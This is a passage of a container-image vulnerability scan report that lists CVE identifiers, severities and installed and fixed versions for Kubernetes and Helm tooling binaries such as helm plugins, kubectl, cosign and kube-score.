stdlib CVE-2024-34156 HIGH v1.20.4 1.22.7, 1.23.1
stdlib CVE-2025-47907 HIGH v1.20.4 1.23.12, 1.24.6
stdlib CVE-2025-58183 HIGH v1.20.4 1.24.8, 1.25.2
stdlib CVE-2025-61726 HIGH v1.20.4 1.24.12, 1.25.6
stdlib CVE-2025-61728 HIGH v1.20.4 1.24.12, 1.25.6
stdlib CVE-2025-61729 HIGH v1.20.4 1.24.11, 1.25.5
stdlib CVE-2025-61730 HIGH v1.20.4 1.24.12, 1.25.6
stdlib CVE-2023-29406 MEDIUM v1.20.4 1.19.11, 1.20.6
stdlib CVE-2023-29409 MEDIUM v1.20.4 1.19.12, 1.20.7, 1.21.0-rc.4
stdlib CVE-2023-39318 MEDIUM v1.20.4 1.20.8, 1.21.1
stdlib CVE-2023-39319 MEDIUM v1.20.4 1.20.8, 1.21.1
stdlib CVE-2023-39326 MEDIUM v1.20.4 1.20.12, 1.21.5
stdlib CVE-2023-45284 MEDIUM v1.20.4 1.20.11, 1.21.4
stdlib CVE-2023-45289 MEDIUM v1.20.4 1.21.8, 1.22.1
stdlib CVE-2023-45290 MEDIUM v1.20.4 1.21.8, 1.22.1
stdlib CVE-2024-24783 MEDIUM v1.20.4 1.21.8, 1.22.1
stdlib CVE-2024-24784 MEDIUM v1.20.4 1.21.8, 1.22.1
stdlib CVE-2024-24785 MEDIUM v1.20.4 1.21.8, 1.22.1
stdlib CVE-2024-24789 MEDIUM v1.20.4 1.21.11, 1.22.4
stdlib CVE-2024-24791 MEDIUM v1.20.4 1.21.12, 1.22.5
stdlib CVE-2024-34155 MEDIUM v1.20.4 1.22.7, 1.23.1
stdlib CVE-2024-34158 MEDIUM v1.20.4 1.22.7, 1.23.1
stdlib CVE-2024-45336 MEDIUM v1.20.4 1.22.11, 1.23.5, 1.24.0-rc.2
stdlib CVE-2024-45341 MEDIUM v1.20.4 1.22.11, 1.23.5, 1.24.0-rc.2
stdlib CVE-2025-0913 MEDIUM v1.20.4 1.23.10, 1.24.4
stdlib CVE-2025-22866 MEDIUM v1.20.4 1.22.12, 1.23.6, 1.24.0-rc.3
stdlib CVE-2025-22871 MEDIUM v1.20.4 1.23.8, 1.24.2
stdlib CVE-2025-22873 MEDIUM v1.20.4 1.23.9, 1.24.3
stdlib CVE-2025-4673 MEDIUM v1.20.4 1.23.10, 1.24.4
stdlib CVE-2025-47906 MEDIUM v1.20.4 1.23.12, 1.24.6
stdlib CVE-2025-47912 MEDIUM v1.20.4 1.24.8, 1.25.2
stdlib CVE-2025-58185 MEDIUM v1.20.4 1.24.8, 1.25.2
stdlib CVE-2025-58186 MEDIUM v1.20.4 1.24.8, 1.25.2
stdlib CVE-2025-58187 MEDIUM v1.20.4 1.24.9, 1.25.3
stdlib CVE-2025-58188 MEDIUM v1.20.4 1.24.8, 1.25.2
stdlib CVE-2025-58189 MEDIUM v1.20.4 1.24.8, 1.25.2
stdlib CVE-2025-61723 MEDIUM v1.20.4 1.24.8, 1.25.2
stdlib CVE-2025-61724 MEDIUM v1.20.4 1.24.8, 1.25.2
stdlib CVE-2025-61725 MEDIUM v1.20.4 1.24.8, 1.25.2
stdlib CVE-2025-61727 MEDIUM v1.20.4 1.24.11, 1.25.5

No Misconfigurations found

root/.local/share/helm/plugins/helm-schema/bin/helm-schema

34 known vulnerabilities found (CRITICAL: 2 HIGH: 8 MEDIUM: 24 LOW: 0)

Show detailed table of vulnerabilities
Package ID Severity Installed Version Fixed Version
golang.org/x/crypto CVE-2024-45337 CRITICAL v0.21.0 0.31.0
golang.org/x/crypto CVE-2025-22869 HIGH v0.21.0 0.35.0
golang.org/x/crypto CVE-2025-47914 MEDIUM v0.21.0 0.45.0
golang.org/x/crypto CVE-2025-58181 MEDIUM v0.21.0 0.45.0
helm.sh/helm/v3 CVE-2025-53547 HIGH v3.15.2 3.18.4, 3.17.4
helm.sh/helm/v3 CVE-2025-32386 MEDIUM v3.15.2 3.17.3
helm.sh/helm/v3 CVE-2025-32387 MEDIUM v3.15.2 3.17.3
helm.sh/helm/v3 CVE-2025-55198 MEDIUM v3.15.2 3.18.5
helm.sh/helm/v3 CVE-2025-55199 MEDIUM v3.15.2 3.18.5
stdlib CVE-2025-68121 CRITICAL v1.23.3 1.24.13, 1.25.7, 1.26.0-rc.3
stdlib CVE-2025-47907 HIGH v1.23.3 1.23.12, 1.24.6
stdlib CVE-2025-58183 HIGH v1.23.3 1.24.8, 1.25.2
stdlib CVE-2025-61726 HIGH v1.23.3 1.24.12, 1.25.6
stdlib CVE-2025-61728 HIGH v1.23.3 1.24.12, 1.25.6
stdlib CVE-2025-61729 HIGH v1.23.3 1.24.11, 1.25.5
stdlib CVE-2025-61730 HIGH v1.23.3 1.24.12, 1.25.6
stdlib CVE-2024-45336 MEDIUM v1.23.3 1.22.11, 1.23.5, 1.24.0-rc.2
stdlib CVE-2024-45341 MEDIUM v1.23.3 1.22.11, 1.23.5, 1.24.0-rc.2
stdlib CVE-2025-0913 MEDIUM v1.23.3 1.23.10, 1.24.4
stdlib CVE-2025-22866 MEDIUM v1.23.3 1.22.12, 1.23.6, 1.24.0-rc.3
stdlib CVE-2025-22871 MEDIUM v1.23.3 1.23.8, 1.24.2
stdlib CVE-2025-22873 MEDIUM v1.23.3 1.23.9, 1.24.3
stdlib CVE-2025-4673 MEDIUM v1.23.3 1.23.10, 1.24.4
stdlib CVE-2025-47906 MEDIUM v1.23.3 1.23.12, 1.24.6
stdlib CVE-2025-47912 MEDIUM v1.23.3 1.24.8, 1.25.2
stdlib CVE-2025-58185 MEDIUM v1.23.3 1.24.8, 1.25.2
stdlib CVE-2025-58186 MEDIUM v1.23.3 1.24.8, 1.25.2
stdlib CVE-2025-58187 MEDIUM v1.23.3 1.24.9, 1.25.3
stdlib CVE-2025-58188 MEDIUM v1.23.3 1.24.8, 1.25.2
stdlib CVE-2025-58189 MEDIUM v1.23.3 1.24.8, 1.25.2
stdlib CVE-2025-61723 MEDIUM v1.23.3 1.24.8, 1.25.2
stdlib CVE-2025-61724 MEDIUM v1.23.3 1.24.8, 1.25.2
stdlib CVE-2025-61725 MEDIUM v1.23.3 1.24.8, 1.25.2
stdlib CVE-2025-61727 MEDIUM v1.23.3 1.24.11, 1.25.5

No Misconfigurations found

root/.local/share/helm/plugins/helm-unittest/untt

6 known vulnerabilities found (CRITICAL: 1 HIGH: 3 MEDIUM: 2 LOW: 0)

Show detailed table of vulnerabilities
Package ID Severity Installed Version Fixed Version
golang.org/x/crypto CVE-2025-47914 MEDIUM v0.42.0 0.45.0
golang.org/x/crypto CVE-2025-58181 MEDIUM v0.42.0 0.45.0
stdlib CVE-2025-68121 CRITICAL v1.24.11 1.24.13, 1.25.7, 1.26.0-rc.3
stdlib CVE-2025-61726 HIGH v1.24.11 1.24.12, 1.25.6
stdlib CVE-2025-61728 HIGH v1.24.11 1.24.12, 1.25.6
stdlib CVE-2025-61730 HIGH v1.24.11 1.24.12, 1.25.6

No Misconfigurations found

root/gcrane

6 known vulnerabilities found (CRITICAL: 1 HIGH: 4 MEDIUM: 1 LOW: 0)

Show detailed table of vulnerabilities
Package ID Severity Installed Version Fixed Version
stdlib CVE-2025-68121 CRITICAL v1.24.10 1.24.13, 1.25.7, 1.26.0-rc.3
stdlib CVE-2025-61726 HIGH v1.24.10 1.24.12, 1.25.6
stdlib CVE-2025-61728 HIGH v1.24.10 1.24.12, 1.25.6
stdlib CVE-2025-61729 HIGH v1.24.10 1.24.11, 1.25.5
stdlib CVE-2025-61730 HIGH v1.24.10 1.24.12, 1.25.6
stdlib CVE-2025-61727 MEDIUM v1.24.10 1.24.11, 1.25.5

No Misconfigurations found

root/krane

6 known vulnerabilities found (LOW: 0 CRITICAL: 1 HIGH: 4 MEDIUM: 1)

Show detailed table of vulnerabilities
Package ID Severity Installed Version Fixed Version
stdlib CVE-2025-68121 CRITICAL v1.24.10 1.24.13, 1.25.7, 1.26.0-rc.3
stdlib CVE-2025-61726 HIGH v1.24.10 1.24.12, 1.25.6
stdlib CVE-2025-61728 HIGH v1.24.10 1.24.12, 1.25.6
stdlib CVE-2025-61729 HIGH v1.24.10 1.24.11, 1.25.5
stdlib CVE-2025-61730 HIGH v1.24.10 1.24.12, 1.25.6
stdlib CVE-2025-61727 MEDIUM v1.24.10 1.24.11, 1.25.5

No Misconfigurations found

usr/bin/kubectl

1 known vulnerabilities found (CRITICAL: 1 HIGH: 0 MEDIUM: 0 LOW: 0)

Show detailed table of vulnerabilities
Package ID Severity Installed Version Fixed Version
stdlib CVE-2025-68121 CRITICAL v1.25.6 1.24.13, 1.25.7, 1.26.0-rc.3

No Misconfigurations found

usr/local/bin/ah

16 known vulnerabilities found (MEDIUM: 8 LOW: 2 CRITICAL: 1 HIGH: 5)

Show detailed table of vulnerabilities
Package ID Severity Installed Version Fixed Version
github.com/cloudflare/circl CVE-2026-1229 LOW v1.6.1 1.6.3
github.com/containerd/containerd CVE-2024-25621 HIGH v1.7.28 1.7.29
github.com/containerd/containerd CVE-2025-64329 MEDIUM v1.7.28 1.7.29
github.com/go-git/go-git/v5 CVE-2026-25934 MEDIUM v5.16.3 5.16.5
github.com/sigstore/cosign CVE-2026-24122 LOW v1.13.6 3.0.5
github.com/sigstore/rekor CVE-2026-23831 MEDIUM v1.4.2 1.5.0
github.com/sigstore/rekor CVE-2026-24117 MEDIUM v1.4.2 1.5.0
github.com/sigstore/sigstore CVE-2026-24137 MEDIUM v1.9.5 1.10.4
golang.org/x/crypto CVE-2025-47914 MEDIUM v0.43.0 0.45.0
golang.org/x/crypto CVE-2025-58181 MEDIUM v0.43.0 0.45.0
stdlib CVE-2025-68121 CRITICAL v1.25.3 1.24.13, 1.25.7, 1.26.0-rc.3
stdlib CVE-2025-61726 HIGH v1.25.3 1.24.12, 1.25.6
stdlib CVE-2025-61728 HIGH v1.25.3 1.24.12, 1.25.6
stdlib CVE-2025-61729 HIGH v1.25.3 1.24.11, 1.25.5
stdlib CVE-2025-61730 HIGH v1.25.3 1.24.12, 1.25.6
stdlib CVE-2025-61727 MEDIUM v1.25.3 1.24.11, 1.25.5

No Misconfigurations found

usr/local/bin/chart-doc-gen

42 known vulnerabilities found (MEDIUM: 30 LOW: 0 CRITICAL: 2 HIGH: 10)

Show detailed table of vulnerabilities
Package ID Severity Installed Version Fixed Version
google.golang.org/protobuf CVE-2024-24786 MEDIUM v1.30.0 1.33.0
stdlib CVE-2024-24790 CRITICAL v1.21.2 1.21.11, 1.22.4
stdlib CVE-2025-68121 CRITICAL v1.21.2 1.24.13, 1.25.7, 1.26.0-rc.3
stdlib CVE-2023-39325 HIGH v1.21.2 1.20.10, 1.21.3
stdlib CVE-2023-45283 HIGH v1.21.2 1.20.11, 1.21.4, 1.20.12, 1.21.5
stdlib CVE-2023-45288 HIGH v1.21.2 1.21.9, 1.22.2
stdlib CVE-2024-34156 HIGH v1.21.2 1.22.7, 1.23.1
stdlib CVE-2025-47907 HIGH v1.21.2 1.23.12, 1.24.6
stdlib CVE-2025-58183 HIGH v1.21.2 1.24.8, 1.25.2
stdlib CVE-2025-61726 HIGH v1.21.2 1.24.12, 1.25.6
stdlib CVE-2025-61728 HIGH v1.21.2 1.24.12, 1.25.6
stdlib CVE-2025-61729 HIGH v1.21.2 1.24.11, 1.25.5
stdlib CVE-2025-61730 HIGH v1.21.2 1.24.12, 1.25.6
stdlib CVE-2023-39326 MEDIUM v1.21.2 1.20.12, 1.21.5
stdlib CVE-2023-45284 MEDIUM v1.21.2 1.20.11, 1.21.4
stdlib CVE-2023-45289 MEDIUM v1.21.2 1.21.8, 1.22.1
stdlib CVE-2023-45290 MEDIUM v1.21.2 1.21.8, 1.22.1
stdlib CVE-2024-24783 MEDIUM v1.21.2 1.21.8, 1.22.1
stdlib CVE-2024-24784 MEDIUM v1.21.2 1.21.8, 1.22.1
stdlib CVE-2024-24785 MEDIUM v1.21.2 1.21.8, 1.22.1
stdlib CVE-2024-24789 MEDIUM v1.21.2 1.21.11, 1.22.4
stdlib CVE-2024-24791 MEDIUM v1.21.2 1.21.12, 1.22.5
stdlib CVE-2024-34155 MEDIUM v1.21.2 1.22.7, 1.23.1
stdlib CVE-2024-34158 MEDIUM v1.21.2 1.22.7, 1.23.1
stdlib CVE-2024-45336 MEDIUM v1.21.2 1.22.11, 1.23.5, 1.24.0-rc.2
stdlib CVE-2024-45341 MEDIUM v1.21.2 1.22.11, 1.23.5, 1.24.0-rc.2
stdlib CVE-2025-0913 MEDIUM v1.21.2 1.23.10, 1.24.4
stdlib CVE-2025-22866 MEDIUM v1.21.2 1.22.12, 1.23.6, 1.24.0-rc.3
stdlib CVE-2025-22871 MEDIUM v1.21.2 1.23.8, 1.24.2
stdlib CVE-2025-22873 MEDIUM v1.21.2 1.23.9, 1.24.3
stdlib CVE-2025-4673 MEDIUM v1.21.2 1.23.10, 1.24.4
stdlib CVE-2025-47906 MEDIUM v1.21.2 1.23.12, 1.24.6
stdlib CVE-2025-47912 MEDIUM v1.21.2 1.24.8, 1.25.2
stdlib CVE-2025-58185 MEDIUM v1.21.2 1.24.8, 1.25.2
stdlib CVE-2025-58186 MEDIUM v1.21.2 1.24.8, 1.25.2
stdlib CVE-2025-58187 MEDIUM v1.21.2 1.24.9, 1.25.3
stdlib CVE-2025-58188 MEDIUM v1.21.2 1.24.8, 1.25.2
stdlib CVE-2025-58189 MEDIUM v1.21.2 1.24.8, 1.25.2
stdlib CVE-2025-61723 MEDIUM v1.21.2 1.24.8, 1.25.2
stdlib CVE-2025-61724 MEDIUM v1.21.2 1.24.8, 1.25.2
stdlib CVE-2025-61725 MEDIUM v1.21.2 1.24.8, 1.25.2
stdlib CVE-2025-61727 MEDIUM v1.21.2 1.24.11, 1.25.5

No Misconfigurations found

usr/local/bin/conftest

4 known vulnerabilities found (CRITICAL: 1 HIGH: 3 MEDIUM: 0 LOW: 0)

Show detailed table of vulnerabilities
Package ID Severity Installed Version Fixed Version
stdlib CVE-2025-68121 CRITICAL v1.25.5 1.24.13, 1.25.7, 1.26.0-rc.3
stdlib CVE-2025-61726 HIGH v1.25.5 1.24.12, 1.25.6
stdlib CVE-2025-61728 HIGH v1.25.5 1.24.12, 1.25.6
stdlib CVE-2025-61730 HIGH v1.25.5 1.24.12, 1.25.6

No Misconfigurations found

usr/local/bin/container-structure-test

30 known vulnerabilities found (HIGH: 8 MEDIUM: 19 LOW: 1 CRITICAL: 2)

Show detailed table of vulnerabilities
Package ID Severity Installed Version Fixed Version
github.com/containerd/containerd CVE-2024-25621 HIGH v1.7.13 1.7.29
github.com/containerd/containerd CVE-2024-40635 MEDIUM v1.7.13 1.7.27, 1.6.38
github.com/containerd/containerd CVE-2025-64329 MEDIUM v1.7.13 1.7.29
github.com/docker/docker CVE-2025-54410 LOW v27.1.1+incompatible 28.0.0
golang.org/x/crypto CVE-2024-45337 CRITICAL v0.25.0 0.31.0
golang.org/x/crypto CVE-2025-22869 HIGH v0.25.0 0.35.0
golang.org/x/crypto CVE-2025-47914 MEDIUM v0.25.0 0.45.0
golang.org/x/crypto CVE-2025-58181 MEDIUM v0.25.0 0.45.0
stdlib CVE-2025-68121 CRITICAL v1.22.12 1.24.13, 1.25.7, 1.26.0-rc.3
stdlib CVE-2025-47907 HIGH v1.22.12 1.23.12, 1.24.6
stdlib CVE-2025-58183 HIGH v1.22.12 1.24.8, 1.25.2
stdlib CVE-2025-61726 HIGH v1.22.12 1.24.12, 1.25.6
stdlib CVE-2025-61728 HIGH v1.22.12 1.24.12, 1.25.6
stdlib CVE-2025-61729 HIGH v1.22.12 1.24.11, 1.25.5
stdlib CVE-2025-61730 HIGH v1.22.12 1.24.12, 1.25.6
stdlib CVE-2025-0913 MEDIUM v1.22.12 1.23.10, 1.24.4
stdlib CVE-2025-22871 MEDIUM v1.22.12 1.23.8, 1.24.2
stdlib CVE-2025-22873 MEDIUM v1.22.12 1.23.9, 1.24.3
stdlib CVE-2025-4673 MEDIUM v1.22.12 1.23.10, 1.24.4
stdlib CVE-2025-47906 MEDIUM v1.22.12 1.23.12, 1.24.6
stdlib CVE-2025-47912 MEDIUM v1.22.12 1.24.8, 1.25.2
stdlib CVE-2025-58185 MEDIUM v1.22.12 1.24.8, 1.25.2
stdlib CVE-2025-58186 MEDIUM v1.22.12 1.24.8, 1.25.2
stdlib CVE-2025-58187 MEDIUM v1.22.12 1.24.9, 1.25.3
stdlib CVE-2025-58188 MEDIUM v1.22.12 1.24.8, 1.25.2
stdlib CVE-2025-58189 MEDIUM v1.22.12 1.24.8, 1.25.2
stdlib CVE-2025-61723 MEDIUM v1.22.12 1.24.8, 1.25.2
stdlib CVE-2025-61724 MEDIUM v1.22.12 1.24.8, 1.25.2
stdlib CVE-2025-61725 MEDIUM v1.22.12 1.24.8, 1.25.2
stdlib CVE-2025-61727 MEDIUM v1.22.12 1.24.11, 1.25.5

No Misconfigurations found

usr/local/bin/cosign

11 known vulnerabilities found (LOW: 0 CRITICAL: 1 HIGH: 3 MEDIUM: 7)

Show detailed table of vulnerabilities
Package ID Severity Installed Version Fixed Version
github.com/sigstore/fulcio CVE-2026-22772 MEDIUM v1.8.4 1.8.5
github.com/sigstore/rekor CVE-2026-23831 MEDIUM v1.4.3 1.5.0
github.com/sigstore/rekor CVE-2026-24117 MEDIUM v1.4.3 1.5.0
github.com/sigstore/sigstore CVE-2026-24137 MEDIUM v1.10.3 1.10.4
github.com/theupdateframework/go-tuf/v2 CVE-2026-23991 MEDIUM v2.3.0 2.3.1
github.com/theupdateframework/go-tuf/v2 CVE-2026-23992 MEDIUM v2.3.0 2.3.1
github.com/theupdateframework/go-tuf/v2 CVE-2026-24686 MEDIUM v2.3.0 2.4.1
stdlib CVE-2025-68121 CRITICAL v1.25.5 1.24.13, 1.25.7, 1.26.0-rc.3
stdlib CVE-2025-61726 HIGH v1.25.5 1.24.12, 1.25.6
stdlib CVE-2025-61728 HIGH v1.25.5 1.24.12, 1.25.6
stdlib CVE-2025-61730 HIGH v1.25.5 1.24.12, 1.25.6

No Misconfigurations found

usr/local/bin/crane

6 known vulnerabilities found (CRITICAL: 1 HIGH: 4 MEDIUM: 1 LOW: 0)

Show detailed table of vulnerabilities
Package ID Severity Installed Version Fixed Version
stdlib CVE-2025-68121 CRITICAL v1.24.10 1.24.13, 1.25.7, 1.26.0-rc.3
stdlib CVE-2025-61726 HIGH v1.24.10 1.24.12, 1.25.6
stdlib CVE-2025-61728 HIGH v1.24.10 1.24.12, 1.25.6
stdlib CVE-2025-61729 HIGH v1.24.10 1.24.11, 1.25.5
stdlib CVE-2025-61730 HIGH v1.24.10 1.24.12, 1.25.6
stdlib CVE-2025-61727 MEDIUM v1.24.10 1.24.11, 1.25.5

No Misconfigurations found

usr/local/bin/ct

7 known vulnerabilities found (CRITICAL: 1 HIGH: 4 MEDIUM: 2 LOW: 0)

Show detailed table of vulnerabilities
Package ID Severity Installed Version Fixed Version
stdlib CVE-2025-68121 CRITICAL v1.25.2 1.24.13, 1.25.7, 1.26.0-rc.3
stdlib CVE-2025-61726 HIGH v1.25.2 1.24.12, 1.25.6
stdlib CVE-2025-61728 HIGH v1.25.2 1.24.12, 1.25.6
stdlib CVE-2025-61729 HIGH v1.25.2 1.24.11, 1.25.5
stdlib CVE-2025-61730 HIGH v1.25.2 1.24.12, 1.25.6
stdlib CVE-2025-58187 MEDIUM v1.25.2 1.24.9, 1.25.3
stdlib CVE-2025-61727 MEDIUM v1.25.2 1.24.11, 1.25.5

No Misconfigurations found

usr/local/bin/gomplate

3 known vulnerabilities found (MEDIUM: 1 LOW: 1 CRITICAL: 1 HIGH: 0)

Show detailed table of vulnerabilities
Package ID Severity Installed Version Fixed Version
github.com/cloudflare/circl CVE-2026-1229 LOW v1.6.1 1.6.3
github.com/go-git/go-git/v5 CVE-2026-25934 MEDIUM v5.16.4 5.16.5
stdlib CVE-2025-68121 CRITICAL v1.25.6 1.24.13, 1.25.7, 1.26.0-rc.3

No Misconfigurations found

usr/local/bin/helm

1 known vulnerabilities found (CRITICAL: 0 HIGH: 0 MEDIUM: 0 LOW: 1)

Show detailed table of vulnerabilities
Package ID Severity Installed Version Fixed Version
github.com/cloudflare/circl CVE-2026-1229 LOW v1.6.1 1.6.3

No Misconfigurations found

usr/local/bin/helm-docs

42 known vulnerabilities found (HIGH: 11 MEDIUM: 28 LOW: 0 CRITICAL: 3)

Show detailed table of vulnerabilities
Package ID Severity Installed Version Fixed Version
golang.org/x/crypto CVE-2024-45337 CRITICAL v0.21.0 0.31.0
golang.org/x/crypto CVE-2025-22869 HIGH v0.21.0 0.35.0
golang.org/x/crypto CVE-2025-47914 MEDIUM v0.21.0 0.45.0
golang.org/x/crypto CVE-2025-58181 MEDIUM v0.21.0 0.45.0
helm.sh/helm/v3 CVE-2025-53547 HIGH v3.15.2 3.18.4, 3.17.4
helm.sh/helm/v3 CVE-2025-32386 MEDIUM v3.15.2 3.17.3
helm.sh/helm/v3 CVE-2025-32387 MEDIUM v3.15.2 3.17.3
helm.sh/helm/v3 CVE-2025-55198 MEDIUM v3.15.2 3.18.5
helm.sh/helm/v3 CVE-2025-55199 MEDIUM v3.15.2 3.18.5
stdlib CVE-2024-24790 CRITICAL v1.22.1 1.21.11, 1.22.4
stdlib CVE-2025-68121 CRITICAL v1.22.1 1.24.13, 1.25.7, 1.26.0-rc.3
stdlib CVE-2023-45288 HIGH v1.22.1 1.21.9, 1.22.2
stdlib CVE-2024-24788 HIGH v1.22.1 1.22.3
stdlib CVE-2024-34156 HIGH v1.22.1 1.22.7, 1.23.1
stdlib CVE-2025-47907 HIGH v1.22.1 1.23.12, 1.24.6
stdlib CVE-2025-58183 HIGH v1.22.1 1.24.8, 1.25.2
stdlib CVE-2025-61726 HIGH v1.22.1 1.24.12, 1.25.6
stdlib CVE-2025-61728 HIGH v1.22.1 1.24.12, 1.25.6
stdlib CVE-2025-61729 HIGH v1.22.1 1.24.11, 1.25.5
stdlib CVE-2025-61730 HIGH v1.22.1 1.24.12, 1.25.6
stdlib CVE-2024-24789 MEDIUM v1.22.1 1.21.11, 1.22.4
stdlib CVE-2024-24791 MEDIUM v1.22.1 1.21.12, 1.22.5
stdlib CVE-2024-34155 MEDIUM v1.22.1 1.22.7, 1.23.1
stdlib CVE-2024-34158 MEDIUM v1.22.1 1.22.7, 1.23.1
stdlib CVE-2024-45336 MEDIUM v1.22.1 1.22.11, 1.23.5, 1.24.0-rc.2
stdlib CVE-2024-45341 MEDIUM v1.22.1 1.22.11, 1.23.5, 1.24.0-rc.2
stdlib CVE-2025-0913 MEDIUM v1.22.1 1.23.10, 1.24.4
stdlib CVE-2025-22866 MEDIUM v1.22.1 1.22.12, 1.23.6, 1.24.0-rc.3
stdlib CVE-2025-22871 MEDIUM v1.22.1 1.23.8, 1.24.2
stdlib CVE-2025-22873 MEDIUM v1.22.1 1.23.9, 1.24.3
stdlib CVE-2025-4673 MEDIUM v1.22.1 1.23.10, 1.24.4
stdlib CVE-2025-47906 MEDIUM v1.22.1 1.23.12, 1.24.6
stdlib CVE-2025-47912 MEDIUM v1.22.1 1.24.8, 1.25.2
stdlib CVE-2025-58185 MEDIUM v1.22.1 1.24.8, 1.25.2
stdlib CVE-2025-58186 MEDIUM v1.22.1 1.24.8, 1.25.2
stdlib CVE-2025-58187 MEDIUM v1.22.1 1.24.9, 1.25.3
stdlib CVE-2025-58188 MEDIUM v1.22.1 1.24.8, 1.25.2
stdlib CVE-2025-58189 MEDIUM v1.22.1 1.24.8, 1.25.2
stdlib CVE-2025-61723 MEDIUM v1.22.1 1.24.8, 1.25.2
stdlib CVE-2025-61724 MEDIUM v1.22.1 1.24.8, 1.25.2
stdlib CVE-2025-61725 MEDIUM v1.22.1 1.24.8, 1.25.2
stdlib CVE-2025-61727 MEDIUM v1.22.1 1.24.11, 1.25.5

No Misconfigurations found

usr/local/bin/kube-linter

4 known vulnerabilities found (MEDIUM: 0 LOW: 0 CRITICAL: 1 HIGH: 3)

Show detailed table of vulnerabilities
Package ID Severity Installed Version Fixed Version
stdlib CVE-2025-68121 CRITICAL v1.25.5 1.24.13, 1.25.7, 1.26.0-rc.3
stdlib CVE-2025-61726 HIGH v1.25.5 1.24.12, 1.25.6
stdlib CVE-2025-61728 HIGH v1.25.5 1.24.12, 1.25.6
stdlib CVE-2025-61730 HIGH v1.25.5 1.24.12, 1.25.6

No Misconfigurations found

usr/local/bin/kube-score

24 known vulnerabilities found (MEDIUM: 17 LOW: 0 CRITICAL: 1 HIGH: 6)

Show detailed table of vulnerabilities
Package ID Severity Installed Version Fixed Version
golang.org/x/net CVE-2025-22872 MEDIUM v0.36.0 0.38.0
stdlib CVE-2025-68121 CRITICAL v1.23.5 1.24.13, 1.25.7, 1.26.0-rc.3
stdlib CVE-2025-47907 HIGH v1.23.5 1.23.12, 1.24.6
stdlib CVE-2025-58183 HIGH v1.23.5 1.24.8, 1.25.2
stdlib CVE-2025-61726 HIGH v1.23.5 1.24.12, 1.25.6
stdlib CVE-2025-61728 HIGH v1.23.5 1.24.12, 1.25.6
stdlib CVE-2025-61729 HIGH v1.23.5 1.24.11, 1.25.5
stdlib CVE-2025-61730 HIGH v1.23.5 1.24.12, 1.25.6
stdlib CVE-2025-0913 MEDIUM v1.23.5 1.23.10, 1.24.4
stdlib CVE-2025-22866 MEDIUM v1.23.5 1.22.12, 1.23.6, 1.24.0-rc.3
stdlib CVE-2025-22871 MEDIUM v1.23.5 1.23.8, 1.24.2
stdlib CVE-2025-22873 MEDIUM v1.23.5 1.23.9, 1.24.3
stdlib CVE-2025-4673 MEDIUM v1.23.5 1.23.10, 1.24.4
stdlib CVE-2025-47906 MEDIUM v1.23.5 1.23.12, 1.24.6
stdlib CVE-2025-47912 MEDIUM v1.23.5 1.24.8, 1.25.2
stdlib CVE-2025-58185 MEDIUM v1.23.5 1.24.8, 1.25.2
stdlib CVE-2025-58186 MEDIUM v1.23.5 1.24.8, 1.25.2
stdlib CVE-2025-58187 MEDIUM v1.23.5 1.24.9, 1.25.3
stdlib CVE-2025-58188 MEDIUM v1.23.5 1.24.8, 1.25.2
stdlib CVE-2025-58189 MEDIUM v1.23.5 1.24.8, 1.25.2
stdlib CVE-2025-61723 MEDIUM v1.23.5 1.24.8, 1.25.2
stdlib CVE-2025-61724 MEDIUM v1.23.5 1.24.8, 1.25.2
stdlib CVE-2025-61725 MEDIUM v1.23.5 1.24.8, 1.25.2
stdlib CVE-2025-61727 MEDIUM v1.23.5 1.24.11, 1.25.5

No Misconfigurations found

usr/local/bin/kubeconform

22 known vulnerabilities found (MEDIUM: 14 LOW: 0 CRITICAL: 1 HIGH: 7)

Show detailed table of vulnerabilities
Package ID Severity Installed Version Fixed Version
stdlib CVE-2025-68121 CRITICAL v1.24.2 1.24.13, 1.25.7, 1.26.0-rc.3
stdlib CVE-2025-22874 HIGH v1.24.2 1.24.4
stdlib CVE-2025-47907 HIGH v1.24.2 1.23.12, 1.24.6
stdlib CVE-2025-58183 HIGH v1.24.2 1.24.8, 1.25.2
stdlib CVE-2025-61726 HIGH v1.24.2 1.24.12, 1.25.6
stdlib CVE-2025-61728 HIGH v1.24.2 1.24.12, 1.25.6
stdlib CVE-2025-61729 HIGH v1.24.2 1.24.11, 1.25.5
stdlib CVE-2025-61730 HIGH v1.24.2 1.24.12, 1.25.6
stdlib CVE-2025-0913 MEDIUM v1.24.2 1.23.10, 1.24.4
stdlib CVE-2025-22873 MEDIUM v1.24.2 1.23.9, 1.24.3
stdlib CVE-2025-4673 MEDIUM v1.24.2 1.23.10, 1.24.4
stdlib CVE-2025-47906 MEDIUM v1.24.2 1.23.12, 1.24.6
stdlib CVE-2025-47912 MEDIUM v1.24.2 1.24.8, 1.25.2
stdlib CVE-2025-58185 MEDIUM v1.24.2 1.24.8, 1.25.2
stdlib CVE-2025-58186 MEDIUM v1.24.2 1.24.8, 1.25.2
stdlib CVE-2025-58187 MEDIUM v1.24.2 1.24.9, 1.25.3
stdlib CVE-2025-58188 MEDIUM v1.24.2 1.24.8, 1.25.2
stdlib CVE-2025-58189 MEDIUM v1.24.2 1.24.8, 1.25.2
stdlib CVE-2025-61723 MEDIUM v1.24.2 1.24.8, 1.25.2
stdlib CVE-2025-61724 MEDIUM v1.24.2 1.24.8, 1.25.2
stdlib CVE-2025-61725 MEDIUM v1.24.2 1.24.8, 1.25.2
stdlib CVE-2025-61727 MEDIUM v1.24.2 1.24.11, 1.25.5

No Misconfigurations found

usr/local/bin/kubent

40 known vulnerabilities found (CRITICAL: 1 HIGH: 11 MEDIUM: 28 LOW: 0)

Show detailed table of vulnerabilities
Package ID Severity Installed Version Fixed Version
github.com/open-policy-agent/opa CVE-2025-46569 HIGH v0.67.1 1.4.0
github.com/open-policy-agent/opa CVE-2024-8260 MEDIUM v0.67.1 0.68.0
golang.org/x/net CVE-2025-22870 MEDIUM v0.27.0 0.36.0
golang.org/x/net CVE-2025-22872 MEDIUM v0.27.0 0.38.0
golang.org/x/oauth2 CVE-2025-22868 HIGH v0.16.0 0.27.0
helm.sh/helm/v3 CVE-2024-26147 HIGH v3.13.3 3.14.2
helm.sh/helm/v3 CVE-2025-53547 HIGH v3.13.3 3.18.4, 3.17.4
helm.sh/helm/v3 CVE-2024-25620 MEDIUM v3.13.3 3.14.1
helm.sh/helm/v3 CVE-2025-32386 MEDIUM v3.13.3 3.17.3
helm.sh/helm/v3 CVE-2025-32387 MEDIUM v3.13.3 3.17.3
helm.sh/helm/v3 CVE-2025-55198 MEDIUM v3.13.3 3.18.5
helm.sh/helm/v3 CVE-2025-55199 MEDIUM v3.13.3 3.18.5
stdlib CVE-2025-68121 CRITICAL v1.23.0 1.24.13, 1.25.7, 1.26.0-rc.3
